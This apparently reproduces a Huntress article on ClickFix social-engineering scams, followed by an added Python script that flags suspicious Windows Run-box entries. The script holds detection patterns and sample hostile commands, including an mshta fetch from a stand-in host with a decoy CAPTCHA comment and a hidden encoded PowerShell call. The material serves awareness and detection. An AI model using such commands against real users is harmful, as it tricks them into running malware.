Security News

Cybersecurity news aggregator

MEDIUM Attacks Huntress

That “Friendly” Prompt is ClickFix

  • What: Description of ClickFix scams using AI for social engineering.
  • Impact: Users may fall victim to sophisticated phishing attacks.

Published: March 25, 2026
By: Beth Robinson

Cybercrime isn’t the chaotic mess of random attacks people still imagine. It’s a booming global economy, projected to cost the world $12.2 trillion annually by 2031. Social engineering is one of the main engines driving that growth.

Attackers don’t get paid unless they get access, and as defenders level up, cybercriminals adapt, innovate, and scale. With the explosion of AI across the threat landscape, this means speed, customization, and precision of social engineering lures. The obvious phishing emails of a decade ago are getting phased out for sneakier, stealthier manipulation tactics, like ClickFix scams, designed to blend into everyday workflows, trusted habits, and overlooked obligations.

Social engineering used to be easy to spot. That era is ending fast. Is your security stack ready for what’s to come?

The internet trains you to click

“If I did not see that (ClickFix) in a given day, I would be incredibly surprised and think something was wrong,” says Nick Roddy, Security Operations Analyst at Huntress. This also helps explain why ClickFix made up over 50% of all malware loader activity, according to the Huntress 2026 Cyber Threat Report.

You've probably been through plenty of security awareness trainings, so you’re a pro at spotting phishing emails. You know not to click suspicious links, you double-check sender addresses, and you'd never hand over your credentials to an unsolicited login page.

But what if the attack never looked like an attack at all? What if it looked like a routine tech support call, a human verification request, or a helpful website telling you exactly how to fix a browser crash?

Think about how often websites ask you to do something slightly strange before granting access. Click all the images with a bicycle. Solve this puzzle. Check this box to prove you're not a robot.
Over time, the internet has trained us to complete odd little rituals just to access content. ClickFix exploits that conditioning, and it’s exactly why it’s tripping up so many end users.

More than half the time we're seeing ClickFix. We've definitely seen a lot of ClickFix within the last year. If I did not see that in a given day, I would be incredibly surprised to think something was wrong.

ClickFix is a very interesting type of attack in the sense that it's predominantly focused around social engineering. Threat actors are using the things that we are used to against us. Users have some kind of technical issue, right? They're looking online for a solution and you'll find these malicious websites that say, oh yeah, you want to fix that? Come here. Here are the instructions. Run some Windows shortcut keys, paste some commands into a terminal or a PowerShell prompt and execute those, and that'll resolve your problems. And so they're actively executing code on behalf of the adversary on their system.

It looked so legitimate, like even security professionals were looking at this and saying, hey, I could have actually fallen for this. Most organizations don't get compromised because a user purposefully did something wrong. You can have the most secure environment in the entire world, but all it takes is one person to give away the keys to the kingdom, and then a threat actor is in.

Educating your employees that there is a new threat makes them aware when they first encounter it that this isn't just normal, more weird stuff the internet's asking you to do to access a webpage. It is crucial to make sure you're actually investing in your team with like security awareness training type materials so they understand the threats that they actually face. If we can stop people from falling for these, overall, we're more secure.

Download the Huntress 2026 Cyber Threat Report to stay ahead of the cybercriminals targeting your business.
The attack that feels like help

ClickFix works by tricking users into executing malicious commands on their own systems. Rather than dropping malware through a link or attachment, attackers manipulate victims into doing the work themselves by copying and pasting code into a PowerShell prompt, a Run window, or a terminal. And it abuses functionalities across native Windows, Mac, and Linux operating systems.

Attackers get the same access without the noise of a traditional malware attack. Because the user ran the command themselves, no suspicious files were downloaded, and there was no unsolicited phishing link to second-guess later.

Figure 1: Human verification lure

From copy-paste to full compromise

Because human trust is a moving target, attackers are always innovating to scale their initial access opportunities and reduce drag on tradecraft warning signs. ClickFix is no different. The chart below shows four types of ClickFix variants:

Figure 2: ClickFix attack variations

ClickFix might seem like a small copy/paste blunder. But that couldn’t be further from the truth. Here are two types of attack paths that started when a human fell for ClickFix prompts:

Figure 3: Example of LummaC2 infostealer compromise after a ClickFix infection

Figure 4: Example of an intrusion timeline after a ClickFix infection

Why resilience is a winning bet

Betting on prevention against today’s cybercrime business model is a loss. Of course, it matters, but trust will be exploited, mistakes will happen, and attacks will slip through.

Your bragging rights will come from resilience: spotting threats fast, responding decisively, and containing damage before it spreads. Build systems, processes, and mindsets that survive when deception is inevitable. Assume it happens, don’t pretend it doesn’t. It’s the difference between being breached and staying in business.

Get resilient endpoints and identities today with a Huntress free trial.
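An added example, not part of the Huntress article: a small triage pass over commands typed into the Windows Run window, the paste path described under "The attack that feels like help". It assumes the entries were collected from the per-user Explorer RunMRU registry values (a source the article does not name); the launcher list, indicator patterns and sample entries are constructed for illustration.

```python
import re

# Interpreters and download tools a pasted one-liner typically starts
# (illustrative list, not taken from the article).
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|curl|wget|bash|sh|osascript|msiexec)(\.exe)?\b",
    re.I,
)

# Heuristic indicators (assumptions for this example). A launcher alone is
# routine admin use; a launcher plus any of these deserves a look.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:in\w*)?\s+h(?:id\w*)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "decoy_comment": re.compile(r"#.*\b(?:robot|human|captcha|verif\w*)", re.I),
}

# Constructed sample data in RunMRU form (each stored value ends in "\1").
SAMPLES = [
    r"\\fileserver\share\1",
    r"notepad\1",
    r"cmd\1",
    r"mshta https://example.invalid/check # I am not a robot: CAPTCHA ID 4821\1",
    r"powershell -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgA=\1",  # placeholder blob
]


def normalize_runmru(value: str) -> str:
    """Strip the trailing backslash-1 marker that RunMRU appends."""
    value = value.strip()
    return value[:-2] if value.endswith("\\1") else value


def triage(command: str) -> list[str]:
    """Return the sorted indicator names that fired, or [] if routine."""
    cmd = normalize_runmru(command)
    if not LAUNCHERS.search(cmd):
        return []
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def flagged(entries: list[str]) -> dict[str, list[str]]:
    """Map each suspicious entry to the indicators that matched it."""
    return {e: hits for e in entries if (hits := triage(e))}


if __name__ == "__main__":
    for entry, hits in flagged(SAMPLES).items():
        print(f"{', '.join(hits):32} {normalize_runmru(entry)}")
```

The decoy-comment check targets the trailing "verification" text that keeps the visible part of the Run box looking harmless; treat hits as leads to correlate with process and network telemetry, not as verdicts.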